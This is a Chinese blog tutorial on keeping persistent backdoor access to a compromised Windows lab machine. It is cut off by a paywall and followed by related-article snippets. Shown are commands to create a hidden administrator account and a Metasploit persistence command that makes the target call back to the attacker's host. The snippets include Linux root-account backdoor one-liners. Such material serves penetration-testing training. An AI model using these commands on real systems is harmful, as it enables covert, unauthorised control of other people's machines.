12.3、后渗透测试--持久化后门

最新推荐文章于 2025-09-26 06:00:00 发布
原创 最新推荐文章于 2025-09-26 06:00:00 发布 · 3.9k 阅读 · 43 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#metasploit #meterpreter #持久化后门

本文介绍了在成功入侵目标系统后,如何创建多种类型的后门以保持持久连接。包括创建隐藏用户、使用persistence脚本、metsvc服务、netcat及远程桌面等方式。
攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2   192.168.11.134
 

零、为何要创建后门

当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如 重新启动计算机,此时使用后门将允许自动重新与目标系统建立连 接, 不必每次都需要进行攻击取得 meterpreter 为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门的几种方式。
前提: 获得 meterpreter shell
创建后门的几种方式:
  1. 靶机创建隐藏用户,后期可直接使用隐藏用户登录目标主机;
  2. 通过persistence脚本安装后门;
  3. 通过metsvc服务的方式;
  4. 持久化后门netcat
  5. 通过开启远程桌面

一、靶机创建隐藏用户

1、进入靶机 
meterpreter > shell
2.创建用户 注意这里用户使用了$符号,可以起到隐藏创建用户的目的
C:\Windows\system32>  net user hacker$ Hacker_123  /add
3、将创建的用户添加到管理员组
C:\Windows\system32>  net localgroup administrators hacker$  /add
net user查看不到hacker$用户,但在靶机上还是能看到你创建的这个隐藏用户:

 可以使用hacker$/Hacker_123这个用户登录到靶机。

二、通过persistence脚本安装后门

路径:  metasploit/scripts/meterpreter/persistence.rb  ,用于创建通过启动项启动。会创建注册表,创建文件,  很容易被杀软拦截 
帮助文档:
1、执行 run persistence -S -U -X  -i  5 -p 8888 -r  192.168.11.106  这样靶机在系统登陆,用户登陆,开机,使用中每隔5秒都
最低0.47元/天 解锁文章
meterpreter 持久后门
01-02 846
创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创建持久后门的具体操作步骤如下所示。 (1)激活Meterpreter会话。执行命令如下...
权限维持——Meterpreter后渗透阶段之关闭防火墙与杀毒软件
wy的博客
11-25 1516
meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。
Kali 中 Persistence后门的使用
大方子
09-02 3725
这里我就用最经典的漏洞ms08_067进行演示   靶机:192.168.193.128 攻击机:192.168.193.135   这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作   这里我们已经拿到权限了   然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...
Linux提权与后门:从普通用户到持久化Root的红队指南
最新发布
专注于网络安全攻防技术与安全运营(SecOps)实践。
09-26 873
在Linux渗透测试中,获得一个初始的低权限立足点仅仅是漫长征途的开始。真正的挑战在于如何突破权限的壁垒,登顶root宝座,并在此之后“深藏功与名”,实现持久化的控制。本文将从红队视角,全面解析Linux环境下的权限提升与维持技术。内容覆盖内核漏洞、SUID/SUDO滥用、定时任务劫持等多种提权向量,并深入探讨Systemd服务、SSH后门、内核模块Rootkit等高级持久化手段,为安全从业者提供一份详尽的Linux后渗透攻防宝典。
突破meterpreter建立永久访问权限访问其他主机——借刀杀人
渗透测试
05-09 2025
文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结 前言 渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹 一、使用场景 主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c 本期例子,a主机使用kali,b主机winxp,c主机linux 二、实施步骤 1.渗透b主机 因为目标位winxp,先使用最常用的MS08_06
权限维持(什么是后门?如何留后门?)-Windows篇 (゚益゚メ) 渗透测试
寻觅的博客
09-12 3615
来看看如何做开机自启!我们渗透一定要持久!
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3584
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
MSF之Persistence后门
weixin_46104215的博客
09-27 3395
Persistence:一款使用安装自动方式的持久后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
域内持久化后门
hongduilanjun的博客
11-01 590
可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的hash或者AES-256值。
对STIX2.0标准12个构件的解读
热门推荐
fufu_good的博客
01-29 9万+
简介 STIX是一种描述网络威胁信息的结构化语言,STIX 能够以标准化和结构化的方式获取更广泛的网络威胁信息。 STIX 1.0定义了8种构件:可观测数据(Observation)、攻击指标(Indicator)、安全事件(Incident)、攻击活动(Campaign)、威胁主体(Threat Actor)、攻击目标(ExploitTarget)、攻击方法(TTP)、应对措施(CourseOf...
linux 持久化后门
luguifang2011的专栏
01-18 3351
前言 收集复现下网上linux后门姿势,一起学习下。 这张图特别好 添加超级用户 某些情况下是没有回显的,可以用一句话直接添加用户 1、useradd guest;echo 'guest:123456'|chpasswd 2、useradd -p `openssl passwd 123456` guest 3、useradd -p "$(openssl passwd 12...
Linux持续化后门
小晓晓晓林的博客
02-20 3462
Linux权限维持 环境:Centos7、Kali虚拟机等 1、增加超级用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test 通过命令创建了test 123456的超级用户 2、unix bash远...
后门持久化与隐匿技术分析:原理、机制与实战演化
syg6921008的博客
04-08 2229
后门技术的终极目标从来不是“上线”,而是“沉默存活”。从入口投送、模块部署、免杀策略、行为隐藏,到最终的通信逃避与长期管理,构建一个真正意义上难以察觉、难以清理、难以中断的持久控制体系,才是红队实战中的王道。多节点联动的链式触发多平台切换的逻辑状态机多信道可选的自适应 Beacon多阶段模块的自动化加载管理“看不见的不是不存在,是已经与环境融为一体。愿你所布控的每一条链路,都能悄无声息、久久为功。
在Android中使用带有shell脚本的Kali Linux的持久后门
HTTPPTTH的博客
03-23 1094
此外,如果目标系统与我们在同一局域网中,或者我们拥有静态 IP,那么持久性将会一直存在于局域网或者广域网中,这也是我们需要注意的一个问题。在破解 Android 设备时,可以使用多种方法,但是一旦获得了meterpreter会话,该会话并不是持久的,需要将一个 shell 脚本上传到/sdcard目录的任何位置来实现持久后门。因此,我们需要使用另一种方法,即使用shell命令在/sdcard目录下上传一个后门,并执行脚本,该脚本会自动在该 Android 设备中创建持久后门。之后,需要在终端中输入“
linux持久化
HoAd'blog
08-25 1982
linux持久化后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除 添加超级用户 echo "user:x:0:0::/:/bin/sh" >&g
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1989
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
持久化:Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1572
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
渗透测试实战之WMI持久化记录
anquanzushiye的博客
02-01 1832
0x00 背景WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本...
Android后台服务持久化实践指南
weixin_35815766的博客
07-26 828
IntentService是Android中用于处理异步请求的一个服务类。与普通Service不同,IntentService内部包含一个工作线程,可以处理异步任务。它本质上是一个扩展了Service类的抽象类,内置了HandlerThread来处理任务队列中的请求。每个请求都会被IntentService封装成一个Intent,然后依次处理。IntentService适用于执行那些不需要和用户交互且在后台持续时间不长的操作,例如下载数据或者处理数据。
Juniper EX2200网络设备固件:jinstall-ex-2200-12.3R12-S15-domestic-signed.tgz
在处理此类固件时,网络管理员或IT专业人员通常会在一个安全的环境中,如专用的测试网络,进行安装前的备份。安装过程中,管理员可能会按照厂商提供的文档来进行,这通常包括上传固件、重启设备、以及可能的配置步骤...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值